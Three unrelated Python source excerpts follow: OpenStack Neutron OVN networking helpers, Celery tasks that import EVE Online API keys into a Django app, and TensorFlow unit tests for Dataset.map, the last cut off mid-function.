    non_gw_routes = []
    for route in getattr(ovn_router, 'static_routes', []):
        ext_ids = getattr(route, 'external_ids', {})
        is_ext_gw = strutils.bool_from_string(
            ext_ids.get(constants.OVN_ROUTER_IS_EXT_GW, 'false'))
        if is_ext_gw:
            # External gateway routes are handled separately.
            continue
        non_gw_routes.append({'destination': route.ip_prefix,
                              'nexthop': route.nexthop})
    return non_gw_routes
def is_ovn_l3(l3_plugin):
    """Return True when the L3 plugin carries an OVN client instance."""
    try:
        l3_plugin._ovn_client_inst
    except AttributeError:
        return False
    return True
def get_system_dns_resolvers(resolver_file=DNS_RESOLVER_FILE):
    """Parse nameserver entries from a resolv.conf-style file.

    Returns only entries that are valid IPv4 (strict) or IPv6 addresses;
    an empty list when the file does not exist.
    """
    servers = []
    if not os.path.exists(resolver_file):
        return servers
    with open(resolver_file, 'r') as conf:
        for entry in conf.readlines():
            if not entry.startswith('nameserver'):
                continue
            candidate = entry.split('nameserver')[1].strip()
            if (netutils.is_valid_ipv4(candidate, strict=True) or
                    netutils.is_valid_ipv6(candidate)):
                servers.append(candidate)
    return servers
def get_dhcp_dns_servers(subnet, ip_version=const.IP_VERSION_4):
    """Retrieve the DHCP option DNS servers

    The DHCP should not announce any DNS resolver at all on the subnet if any
    configured DNS server is "0.0.0.0" (IPv4) or "::" (IPv6).
    https://docs.openstack.org/neutron/latest/admin/config-dns-res.html
    """
    def _same_version(ips):
        # Keep only addresses matching the requested IP version.
        return [ip for ip in ips
                if netaddr.IPAddress(ip).version == ip_version]

    # Precedence: subnet-configured servers, then the service config,
    # then the host's own resolvers.
    dns_servers = (subnet.get('dns_nameservers') or
                   _same_version(ovn_conf.get_dns_servers()) or
                   _same_version(get_system_dns_resolvers()))
    if common_utils.is_dns_servers_any_address(dns_servers, ip_version):
        return []
    return dns_servers
def get_port_subnet_ids(port):
    """Return the subnet IDs of every fixed IP on the port."""
    return [fixed_ip['subnet_id'] for fixed_ip in port['fixed_ips']]
def get_method_class(method):
    """Return the class of a bound method, or None for non-methods."""
    if inspect.ismethod(method):
        return method.__self__.__class__
    return None
def ovn_metadata_name(id_):
    """Return the OVN metadata name based on an id."""
    return 'metadata-{}'.format(id_)
def is_gateway_chassis_invalid(chassis_name, gw_chassis,
                               physnet, chassis_physnets):
    """Return True when chassis_name cannot act as a gateway chassis.

    A chassis is invalid when it is the sentinel "invalid" chassis name,
    is unknown to chassis_physnets, does not carry the requested physnet,
    or is excluded from the configured gateway chassis list.

    :param chassis_name: gateway chassis name (string)
    :param gw_chassis: list of gateway chassis in the system
    :param physnet: physical network associated to chassis_name (string)
    :param chassis_physnets: dict linking chassis with their physnets
    :returns: Boolean
    """
    return bool(
        chassis_name == constants.OVN_GATEWAY_INVALID_CHASSIS or
        chassis_name not in chassis_physnets or
        (physnet and physnet not in chassis_physnets.get(chassis_name)) or
        (gw_chassis and chassis_name not in gw_chassis))
def is_provider_network(network):
    """Return the network's router:external flag (False when unset)."""
    external = network.get(external_net.EXTERNAL, False)
    return external
def compute_address_pairs_diff(ovn_port, neutron_port):
    """Compute the differences in the allowed_address_pairs field."""
    ovn_ips = set(
        get_allowed_address_pairs_ip_addresses_from_ovn_port(ovn_port))
    neutron_ips = set(get_allowed_address_pairs_ip_addresses(neutron_port))
    added = neutron_ips - ovn_ips
    removed = ovn_ips - neutron_ips
    return AddrPairsDiff(added, removed, changed=any(added or removed))
def get_ovn_cms_options(chassis):
    """Return the list of CMS options in a Chassis."""
    raw = chassis.external_ids.get(constants.OVN_CMS_OPTIONS, '')
    return [option.strip() for option in raw.split(',')]
def is_gateway_chassis(chassis):
    """Check if the given chassis is a gateway chassis"""
    options = get_ovn_cms_options(chassis)
    return constants.CMS_OPT_CHASSIS_AS_GW in options
def get_port_capabilities(port):
    """Return a list of port's capabilities"""
    profile = port.get(portbindings.PROFILE, {})
    return profile.get(constants.PORT_CAP_PARAM, [])
def get_port_id_from_gwc_row(row):
    """Extract a router port_id from a Gateway_Chassis row name.

    The Gateway_Chassis row stores the router port_id in the row name
    attribute: <prefix>-<port_id>_<chassis_id>

    :param row: A Gateway_Chassis table row.
    :returns: String containing router port_id.
    """
    match = constants.RE_PORT_FROM_GWC.search(row.name)
    return match.group(2)
def get_chassis_availability_zones(chassis):
    """Return the set of availability zones from a given OVN Chassis.

    Parses the first "availability-zones=a:b:c" entry found among the
    chassis CMS options; returns an empty set when chassis is falsy or
    the option is absent.
    """
    azs = set()
    if not chassis:
        return azs
    prefix = constants.CMS_OPT_AVAILABILITY_ZONES + '='
    for option in get_ovn_cms_options(chassis):
        if option.startswith(prefix):
            values = option.split('=')[1]
            azs = {az.strip() for az in values.split(':') if az.strip()}
            break
    return azs
def get_chassis_in_azs(chassis_list, az_list):
    """Return the names of the Chassis that belong to any of the AZs.

    :param chassis_list: A list of Chassis objects
    :param az_list: A list of availability zones
    :returns: A set of Chassis names
    """
    return {ch.name for ch in chassis_list
            if get_chassis_availability_zones(ch).intersection(az_list)}
def get_gateway_chassis_without_azs(chassis_list):
    """Return the names of gateway Chassis with no availability zones.

    :param chassis_list: A list of Chassis objects
    :returns: A set of Chassis names
    """
    names = set()
    for ch in chassis_list:
        if is_gateway_chassis(ch) and not get_chassis_availability_zones(ch):
            names.add(ch.name)
    return names
def parse_ovn_lb_port_forwarding(ovn_rtr_lb_pfs):
    """Return a dictionary compatible with port forwarding from OVN lb.

    Output shape: {fip_id: {protocol: {"vip ip", ...}}}.
    """
    result = {}
    for lb in ovn_rtr_lb_pfs:
        fip_id = lb.external_ids.get(constants.OVN_FIP_EXT_ID_KEY)
        # OVN stores the protocol as a (possibly empty) list; default TCP.
        proto = lb.protocol[0] if lb.protocol else ovsdbapp_const.PROTO_TCP
        proto_set = result.setdefault(fip_id, {}).setdefault(proto, set())
        for vip, backends in lb.vips.items():
            for backend in backends.split(','):
                proto_set.add("{} {}".format(vip, backend))
    return result
def get_network_name_from_datapath(datapath):
    """Strip the 'neutron-' prefix from the datapath's network name."""
    raw_name = datapath.external_ids['name']
    return raw_name.replace('neutron-', '')
def is_port_external(port):
    """Return True if the port maps to lsp.type=external in the OVN DB.

    A port is external when its VNIC type is one of the external port
    types AND it does not advertise the switchdev capability. Accepts a
    port dict, a models_v2.Port DB object or a ports_obj.Port OVO.
    """
    capabilities = []
    vnic_type = portbindings.VNIC_NORMAL
    if isinstance(port, dict):
        vnic_type = port.get(portbindings.VNIC_TYPE,
                             portbindings.VNIC_NORMAL)
        capabilities = get_port_capabilities(port)
    else:
        if isinstance(port, models_v2.Port):
            bindings = port.port_bindings
        elif isinstance(port, ports_obj.Port):
            bindings = port.bindings
        else:  # What else could be "port"?
            bindings = []
        if bindings:
            binding = bindings[0]
            profile = binding.get('profile')
            if profile:
                # DB object, not OVO, stores the dict in JSON.
                if isinstance(profile, str):
                    profile = jsonutils.loads(profile)
                capabilities = profile.get(constants.PORT_CAP_PARAM, [])
            vnic_type = binding.get('vnic_type', portbindings.VNIC_NORMAL)
    return (vnic_type in constants.EXTERNAL_PORT_TYPES and
            constants.PORT_CAP_SWITCHDEV not in capabilities)
def connection_config_to_target_string(connection_config):
    """Converts the Neutron NB/SB connection parameter to the OVN target string

    :param connection_config: Neutron OVN config parameter for the OVN NB or SB
                              database. See "ovn_sb_connection" or
                              "ovn_nb_connection" params.
    :returns: (String) OVN NB/SB ``connection.target`` column value, or
              None when the value cannot be parsed.
    """
    pattern = re.compile(r'^(?P<proto>\w+)\:((?P<ip>.+)\:(?P<port>\d+)|'
                         r'(?P<file>[\w\/\.]+))')
    match = pattern.match(connection_config)
    if not match:
        return None
    parts = match.groupdict()
    if parts['ip'] and parts['port']:
        # Passive target form: p<proto>:<port>:<ip>
        return 'p{}:{}:{}'.format(parts['proto'], parts['port'], parts['ip'])
    if parts['file']:
        return 'p{}:{}'.format(parts['proto'], parts['file'])
| |
import sys
from datetime import datetime, timedelta
from xml.dom import minidom
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.utils.timezone import now, utc
from celery.task import task
from celery.task.sets import TaskSet
from gargoyle import gargoyle
from eve_proxy.exceptions import *
from eve_proxy.models import CachedDocument
from eve_api.models import EVEAccount, EVEPlayerCharacter
from eve_api.app_defines import *
from eve_api.api_exceptions import *
from eve_api.utils import basic_xml_parse_doc
from eve_api.tasks.character import import_eve_characters
from eve_api.tasks.corporation import import_corp_members, import_corp_details
from sso.tasks import update_user_access
@task(ignore_result=True, expires=120)
def queue_apikey_updates(update_delay=86400, batch_size=50):
    """
    Queue import tasks for API keys not refreshed in the last
    update_delay seconds, at most batch_size keys per run.
    """
    log = queue_apikey_updates.get_logger()

    # Respect the global processing kill-switch.
    if gargoyle.is_active('api-disableprocessing'):
        log.info("Backend processing disabled, exiting")
        return

    delta = timedelta(seconds=update_delay)
    log.info("Updating APIs older than %s" % (now() - delta))

    stale = EVEAccount.objects.filter(
        api_last_updated__lt=(now() - delta)).exclude(
        api_status__in=[API_STATUS_ACC_EXPIRED, API_STATUS_KEY_EXPIRED,
                        API_STATUS_AUTH_ERROR])
    if not gargoyle.is_active('eve-cak'):
        # Legacy (non-CAK) mode skips CAK key types (keytype > 2).
        stale = stale.exclude(api_keytype__gt=2)
    accounts = stale.order_by('api_last_updated')[:batch_size]

    log.info("%s account(s) to update" % accounts.count())
    for account in accounts:
        log.debug("Queueing UserID %s for update" % account.pk)
        if account.user:
            import_apikey.delay(api_key=account.api_key,
                                api_userid=account.pk)
        else:
            # Keys with no owning user are deleted instead of updated.
            account.delete()
@task(ignore_result=True)
def import_apikey(api_userid, api_key, user=None, force_cache=False, retry=True, **kwargs):
    """
    Imports a EVE Account from the API, doesn't return a result.

    :param api_userid: EVE API key ID (EVEAccount primary key).
    :param api_key: verification code / API key string.
    :param user: optional Django user id to associate with the account.
    :param force_cache: passed through to the document fetch layer.
    :param retry: when True, transient API errors re-queue this task.
    """
    log = import_apikey.get_logger()
    try:
        import_apikey_func(api_userid, api_key, user, force_cache, log)
    # NOTE: Python 2 except syntax. Only transient fetch failures are
    # caught; other exceptions propagate to celery unchanged.
    except (APIAccessException, DocumentRetrievalError), exc:
        log.debug('Error importing API Key - flagging for retry', exc_info=sys.exc_info(), extra={'data': {'api_userid': api_userid, 'api_key': api_key}})
        if retry:
            # Re-queue with the original positional arguments; celery
            # applies the task's default retry policy.
            import_apikey.retry(args=[api_userid, api_key, user, force_cache], exc=exc, kwargs=kwargs)
        else:
            raise
@task()
def import_apikey_result(api_userid, api_key, user=None, force_cache=False, callback=None, retry=True, **kwargs):
    """
    Imports a EVE Account from the API and returns the account object when completed.

    :param callback: optional celery subtask; when given, it is invoked
                     with the imported account instead of returning it.
    :param retry: when True, transient API errors re-queue this task.
    """
    log = import_apikey_result.get_logger()
    try:
        results = import_apikey_func(api_userid, api_key, user, force_cache, log)
    # NOTE: Python 2 except syntax; transient fetch failures only.
    except (APIAccessException, DocumentRetrievalError), exc:
        log.debug('Error importing API Key - flagging for retry', exc_info=sys.exc_info(), extra={'data': {'api_userid': api_userid, 'api_key': api_key}})
        if retry:
            import_apikey_result.retry(args=[api_userid, api_key, user, force_cache, callback], exc=exc, kwargs=kwargs)
        else:
            raise
    else:
        if callback:
            # NOTE(review): `subtask` is not among this module's visible
            # imports -- confirm it is imported elsewhere in the file.
            subtask(callback).delay(account=results)
        else:
            return results
def import_apikey_func(api_userid, api_key, user=None, force_cache=False, log=logging.getLogger(__name__)):
    """Fetch and store an EVE API key's account and character data.

    Two code paths: the CAK (Customizable API Key) flow when the
    'eve-cak' switch is active and the key is new or CAK-flagged, and
    the legacy flow otherwise. Both paths create/update the EVEAccount,
    translate API error codes into api_status values, prune characters
    no longer on the key and queue a character import task.

    :returns: the updated EVEAccount, or None on early exit.
    """
    log.debug('Importing %s/%s' % (api_userid, api_key))
    try:
        account = EVEAccount.objects.get(pk=api_userid)
    except EVEAccount.DoesNotExist:
        account = None
    # Use CAK if enabled and either a new key or flagged as so
    if (gargoyle.is_active('eve-cak') and (not account or account.is_cak)):
        auth_params = {'keyid': api_userid, 'vcode': api_key}
        keycheck = CachedDocument.objects.api_query('/account/APIKeyInfo.xml.aspx', params=auth_params, no_cache=True)
        doc = basic_xml_parse_doc(keycheck)['eveapi']
        if not 'error' in doc:
            # Success: create the account on first sight and sync key data.
            if not account:
                account, created = EVEAccount.objects.get_or_create(pk=api_userid)
            if user:
                account.user = User.objects.get(id=user)
            if not account.api_key == api_key:
                account.api_key = api_key
            keydoc = doc['result']['key']
            if keydoc['type'] == 'Character':
                account.api_keytype = API_KEYTYPE_CHARACTER
            elif keydoc['type'] == 'Corporation':
                account.api_keytype = API_KEYTYPE_CORPORATION
            elif keydoc['type'] == 'Account':
                account.api_keytype = API_KEYTYPE_ACCOUNT
            account.api_accessmask = int(keydoc['accessMask'])
            # Empty 'expires' means a non-expiring key.
            if not keydoc['expires'] == '':
                account.api_expiry = datetime.strptime(keydoc['expires'], '%Y-%m-%d %H:%M:%S').replace(tzinfo=utc)
            # Checks account status to see if the account is still active
            if not account.api_keytype == API_KEYTYPE_CORPORATION:
                # has_access(25) presumably gates the AccountStatus
                # endpoint -- TODO confirm against EVEAccount.has_access.
                if account.has_access(25):
                    status = CachedDocument.objects.api_query('/account/AccountStatus.xml.aspx', params=auth_params, no_cache=True)
                    status = basic_xml_parse_doc(status)['eveapi']
                    if not status.get('error', None):
                        paiddate = datetime.strptime(status['result']['paidUntil'], '%Y-%m-%d %H:%M:%S').replace(tzinfo=utc)
                        if paiddate <= now():
                            account.api_status = API_STATUS_ACC_EXPIRED
                        else:
                            account.api_status = API_STATUS_OK
                else:
                    account.api_status = API_STATUS_INVALID_PERMISSIONS
                # The key must also grant at least the configured minimum
                # access mask (59638024 is the built-in default).
                if not account.check_access(getattr(settings, 'EVE_API_MINIMUM_KEYMASK', 59638024)):
                    account.api_status = API_STATUS_INVALID_PERMISSIONS
            else:
                # If its a corp key, and we've not errored so far, assume is OK.
                account.api_status = API_STATUS_OK
            # Remove deleted or traded characters
            newcharlist = [int(char['characterID']) for char in doc['result']['key']['characters']]
            for char in account.characters.all().exclude(id__in=newcharlist):
                account.characters.remove(char)
            # Schedule a task to update the characters
            if account.user:
                cb = update_user_access.subtask(kwargs={'user': account.user.id })
            else:
                cb = None
            import_eve_characters.delay(newcharlist, key_id=account.pk, callback=cb)
        else:
            # No account object, just return
            if not account:
                return
            if not account.api_key == api_key:
                # Attempted change of key failed, ignore
                return
            # Map EVE API error codes onto account status flags.
            error = doc['error']['code']
            if int(error) >= 500:
                # API disabled, down or rejecting, return without changes
                return
            elif error in ['202', '203', '204', '205', '212']:
                account.api_status = API_STATUS_AUTH_ERROR
            elif error == '211':
                account.api_status = API_STATUS_ACC_EXPIRED
            elif error in ['222', '223']:
                account.api_status = API_STATUS_KEY_EXPIRED
            elif error in ['221']:
                account.api_status = API_STATUS_INVALID_PERMISSIONS
            else:
                account.api_status = API_STATUS_OTHER_ERROR
            # Status changed: recompute the owning user's access.
            if account.user:
                update_user_access.delay(account.user.id)
    else:
        # Legacy (pre-CAK) key flow.
        auth_params = {'userid': api_userid, 'apikey': api_key}
        account_doc = CachedDocument.objects.api_query('/account/Characters.xml.aspx', params=auth_params, no_cache=force_cache)
        doc = basic_xml_parse_doc(account_doc)['eveapi']
        if not 'error' in doc:
            if not account:
                account, created = EVEAccount.objects.get_or_create(pk=api_userid)
            if user and not account.user:
                account.user = User.objects.get(id=user)
            if not account.api_key == api_key:
                account.api_key = api_key
            account.api_status = API_STATUS_OK
            # Probe AccountStatus to classify the key as full or limited.
            if not account.api_keytype or account.api_keytype == API_KEYTYPE_UNKNOWN:
                keycheck = CachedDocument.objects.api_query('/account/AccountStatus.xml.aspx', params=auth_params, no_cache=True)
                keydoc = basic_xml_parse_doc(keycheck)['eveapi']
                # NOTE(review): the final else branch is unreachable --
                # 'error' is either in keydoc or it is not.
                if 'error' in keydoc:
                    account.api_keytype = API_KEYTYPE_LIMITED
                elif not 'error' in keydoc:
                    account.api_keytype = API_KEYTYPE_FULL
                else:
                    account.api_keytype = API_KEYTYPE_UNKNOWN
            # Remove deleted or traded characters
            newcharlist = [int(char['characterID']) for char in doc['result']['characters']]
            for char in account.characters.all().exclude(id__in=newcharlist):
                account.characters.remove(char)
            # Schedule a task to update the characters
            if account.user:
                cb = update_user_access.subtask(kwargs={'user': account.user.id })
            else:
                cb = None
            import_eve_characters.delay(newcharlist, key_id=account.pk, callback=cb)
        else:
            # No account object, just return
            if not account:
                return
            if not account.api_key == api_key:
                # Attempted change of key failed, ignore
                return
            error = doc['error']['code']
            if int(error) >= 500:
                # API disabled, down or rejecting, return without changes
                return
            elif error in ['202', '203', '204', '205', '212']:
                account.api_status = API_STATUS_AUTH_ERROR
            elif error in ['211', '223']:
                account.api_status = API_STATUS_ACC_EXPIRED
            else:
                account.api_status = API_STATUS_OTHER_ERROR
            if account.user:
                update_user_access.delay(account.user.id)
    # Record the update time and persist whatever state we reached.
    account.api_last_updated = now()
    account.save()
    return account
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.contrib.data.python.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class MapDatasetTest(test.TestCase):
  """Tests for `Dataset.map()`: serial and parallel mapping, error
  propagation and `ignore_errors()`, and capturing external resources
  (hash tables, queues, variables) inside map functions."""

  def _buildMapDataset(self, components, count):
    # Builds TensorSliceDataset -> MapDataset(square_3) ->
    # RepeatDataset(count).
    def _map_fn(x, y, z):
      return math_ops.square(x), math_ops.square(y), math_ops.square(z)
    return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
            .repeat(count))

  def testMapDataset(self):
    """Test an dataset that maps a TF function across its input elements."""
    # The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
    # RepeatDataset(count).
    components = (np.arange(7),
                  np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
                  np.array(37.0) * np.arange(7))
    count = array_ops.placeholder(dtypes.int64, shape=[])
    dataset = self._buildMapDataset(components, count)
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    # Mapping squares elementwise, so output shapes match the inputs
    # minus the sliced leading dimension.
    self.assertEqual([c.shape[1:] for c in components],
                     [t.shape for t in get_next])
    with self.test_session() as sess:
      # Test single-threaded access to the iterator.
      sess.run(init_op, feed_dict={count: 14})
      for _ in range(14):
        for i in range(7):
          result = sess.run(get_next)
          for component, result_component in zip(components, result):
            self.assertAllEqual(component[i]**2, result_component)
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)
      # Test multi-threaded access to the same iterator.
      sess.run(init_op, feed_dict={count: 18})
      results = []
      def iterator_thread():
        while True:
          try:
            results.append(sess.run(get_next))
          except errors.OutOfRangeError:
            return
      threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
      for t in threads:
        t.start()
      for t in threads:
        t.join()
      # `results` will contain the same elements components**2
      # repeated 18 times, but in a non-deterministic order. Sort the
      # results, and assert that each element of components**2 is
      # produced 18 times.
      results.sort(key=lambda x: x[0])
      for i in range(7):
        for j in range(18):
          for component, result_component in zip(components,
                                                 results[i * 18 + j]):
            self.assertAllEqual(component[i]**2, result_component)

  def _buildParallelMapDataset(self, components, count, num_threads,
                               output_buffer_size):
    # Same pipeline as _buildMapDataset but with a parallel map stage.
    def _map_fn(x, y, z):
      return math_ops.square(x), math_ops.square(y), math_ops.square(z)
    return (dataset_ops.Dataset.from_tensor_slices(components).map(
        _map_fn, num_threads=num_threads, output_buffer_size=output_buffer_size)
            .repeat(count))

  def testParallelMapDataset(self):
    """Test an dataset that maps a TF function across its input elements."""
    # The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
    # RepeatDataset(count).
    components = (np.arange(7),
                  np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
                  np.array(37.0) * np.arange(7))
    count = array_ops.placeholder(dtypes.int64, shape=[])
    num_threads = array_ops.placeholder(dtypes.int32, shape=[])
    output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
    dataset = self._buildParallelMapDataset(components, count, num_threads,
                                            output_buffer_size)
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    self.assertEqual([c.shape[1:] for c in components],
                     [t.shape for t in get_next])
    with self.test_session() as sess:
      def do_test(num_threads_val, output_buffer_size_val):
        # Test single-threaded access to the iterator.
        sess.run(init_op, feed_dict={
            count: 14,
            num_threads: num_threads_val,
            output_buffer_size: output_buffer_size_val})
        for _ in range(14):
          for i in range(7):
            result = sess.run(get_next)
            for component, result_component in zip(components, result):
              self.assertAllEqual(component[i]**2, result_component)
        with self.assertRaises(errors.OutOfRangeError):
          sess.run(get_next)
        # Test multi-threaded access to the same iterator.
        sess.run(init_op, feed_dict={
            count: 18,
            num_threads: num_threads_val,
            output_buffer_size: output_buffer_size_val})
        results = []
        def iterator_thread():
          while True:
            try:
              results.append(sess.run(get_next))
            except errors.OutOfRangeError:
              return
        threads = [self.checkedThread(target=iterator_thread)
                   for _ in range(64)]
        for t in threads:
          t.start()
        for t in threads:
          t.join()
        # `results` will contain the same elements components**2
        # repeated 18 times, but in a non-deterministic order. Sort the
        # results, and assert that each element of components**2 is
        # produced 18 times.
        results.sort(key=lambda x: x[0])
        for i in range(7):
          for j in range(18):
            for component, result_component in zip(components,
                                                   results[i * 18 + j]):
              self.assertAllEqual(component[i]**2, result_component)

      # Exercise several thread-count / buffer-size combinations.
      for num_threads_val, output_buffer_size_val in [
          (1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
        do_test(num_threads_val, output_buffer_size_val)

  def _testDisposeParallelMapDataset(self, explicit_dispose):
    # Checks that a partially-consumed parallel map pipeline shuts down
    # cleanly, with or without an explicit dispose op.
    # The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
    # RepeatDataset(1000).
    components = (np.arange(1000),
                  np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
                  np.array(37.0) * np.arange(1000))
    dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    if explicit_dispose:
      dispose_op = iterator.dispose_op()
    with self.test_session() as sess:
      sess.run(init_op)
      for _ in range(3):
        sess.run(get_next)
      if explicit_dispose:
        sess.run(dispose_op)

  def testExplicitDisposeParallelMapDataset(self):
    """Dispose of a parallel map iterator explicitly."""
    self._testDisposeParallelMapDataset(True)

  def testImplicitDisposeParallelMapDataset(self):
    """Let session teardown dispose of a parallel map iterator."""
    self._testDisposeParallelMapDataset(False)

  def testParallelMapUnspecifiedOutputSize(self):
    """Parallel map works without an explicit output_buffer_size."""
    components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    dataset = (dataset_ops.Dataset.from_tensor_slices(components)
               .map(lambda x: array_ops.check_numerics(x, "message"),
                    num_threads=2))
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      for _ in range(3):
        sess.run(get_next)

  def testParallelMapError(self):
    """An error raised inside a parallel map fn surfaces to the caller."""
    components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    dataset = (dataset_ops.Dataset.from_tensor_slices(components)
               .map(lambda x: array_ops.check_numerics(x, "message"),
                    num_threads=2, output_buffer_size=2))
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      for _ in range(3):
        sess.run(get_next)
      # The 4th element is NaN, so `array_ops.check_numerics()` should fail.
      with self.assertRaises(errors.InvalidArgumentError):
        sess.run(get_next)
      sess.run(get_next)
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testMapIgnoreError(self):
    """ignore_errors() drops the failing element and continues."""
    components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    dataset = (dataset_ops.Dataset.from_tensor_slices(components)
               .map(lambda x: array_ops.check_numerics(x, "message"))
               .ignore_errors())
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      # The NaN element is silently skipped.
      for x in [1., 2., 3., 5.]:
        self.assertEqual(x, sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testParallelMapIgnoreError(self):
    """ignore_errors() also works downstream of a parallel map."""
    components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
    dataset = (dataset_ops.Dataset.from_tensor_slices(components)
               .map(lambda x: array_ops.check_numerics(x, "message"),
                    num_threads=2, output_buffer_size=2)
               .ignore_errors())
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(init_op)
      for x in [1., 2., 3., 5.]:
        self.assertEqual(x, sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testReadFileIgnoreError(self):
    """ignore_errors() skips files that fail to read."""
    def write_string_to_file(value, filename):
      with open(filename, "w") as f:
        f.write(value)
    filenames = [os.path.join(self.get_temp_dir(), "file_%d.txt" % i)
                 for i in range(5)]
    # Each file's content is its own filename.
    for filename in filenames:
      write_string_to_file(filename, filename)
    dataset = (dataset_ops.Dataset.from_tensor_slices(filenames)
               .map(io_ops.read_file, num_threads=2, output_buffer_size=2)
               .ignore_errors())
    iterator = dataset.make_initializable_iterator()
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      # All of the files are present.
      sess.run(init_op)
      for filename in filenames:
        self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)
      # Delete one of the files.
      os.remove(filenames[0])
      # Attempting to read filenames[0] will fail, but ignore_errors()
      # will catch the error.
      sess.run(init_op)
      for filename in filenames[1:]:
        self.assertEqual(compat.as_bytes(filename), sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testCaptureHashTable(self):
    """A map fn can capture and use an initialized lookup table."""
    # NOTE(mrry): We must use the V2 variants of `HashTable`
    # etc. because these produce a `tf.resource`-typed output that is
    # compatible with the in-graph function implementation.
    default_val = -1
    keys = constant_op.constant(["brain", "salad", "surgery"])
    values = constant_op.constant([0, 1, 2], dtypes.int64)
    table = lookup_ops.HashTable(
        lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
    input_sentences = dataset_ops.Dataset.from_tensor_slices(
        ["brain brain tank salad surgery", "surgery brain"])
    iterator = (input_sentences
                .map(lambda x: string_ops.string_split([x]).values)
                .map(table.lookup)
                .make_initializable_iterator())
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(table.init)
      sess.run(init_op)
      print(sess.run(get_next))
      print(sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testCaptureQueue(self):
    """A map fn can dequeue from a captured (closed) FIFO queue."""
    elements = np.random.randint(100, size=[200])
    queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
    enqueue_op = queue.enqueue_many(elements)
    close_op = queue.close()
    iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
                .map(lambda _: queue.dequeue()).make_initializable_iterator())
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(enqueue_op)
      sess.run(close_op)
      sess.run(init_op)
      for element in elements:
        self.assertEqual(element, sess.run(get_next))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)

  def testCaptureVariable(self):
    """A map fn can mutate a captured resource variable."""
    counter_var = variable_scope.get_variable(
        "counter", (), dtypes.int32, use_resource=True)
    iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
                .map(lambda _: counter_var.assign_add(1))
                .make_initializable_iterator())
    init_op = iterator.initializer
    get_next = iterator.get_next()
    with self.test_session() as sess:
      sess.run(counter_var.initializer)
      sess.run(init_op)
      for i in range(10):
        self.assertEqual(i, sess.run(counter_var))
        self.assertEqual(i + 1, sess.run(get_next))
      self.assertEqual(10, sess.run(counter_var))
      with self.assertRaises(errors.OutOfRangeError):
        sess.run(get_next)
      self.assertEqual(10, sess.run(counter_var))

  def testCaptureUninitializedVariableError(self):
    """Capturing an uninitialized resource variable fails at init time."""
    counter_var = variable_scope.get_variable(
        "counter", (), dtypes.int32, use_resource=True)
    iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
                .map(lambda _: counter_var.assign_add(1))
                .make_initializable_iterator())
    init_op = iterator.initializer
    with self.test_session() as sess:
      with self.assertRaisesRegexp(errors.FailedPreconditionError,
                                   "Failed to capture resource"):
        sess.run(init_op)

  def testSeededStatefulOperatorIsProperlyStateful(self):
